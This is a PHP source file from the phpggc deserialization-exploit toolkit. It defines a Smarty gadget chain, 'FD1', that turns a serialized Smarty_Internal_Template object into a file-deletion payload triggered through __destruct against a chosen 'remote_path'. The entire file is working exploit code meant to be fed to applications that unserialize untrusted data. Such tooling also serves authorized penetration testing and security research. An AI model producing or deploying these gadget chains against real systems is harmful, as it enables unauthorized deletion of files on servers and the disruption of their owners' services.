Codebase list phpggc / 4aee49b gadgetchains / Smarty / FD / 1 / chain.php
4aee49b

Tree @4aee49b (Download .tar.gz)

chain.php @4aee49braw · history · blame

<?php

namespace GadgetChain\Smarty;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '?';
    public static $vector = '__destruct';
    public static $author = 'd3adc0de';
    public static $parameters = [
        'remote_path'
    ];

    public function generate(array $parameters)
    {
        return new \Smarty_Internal_Template($parameters['remote_path']);
    }
}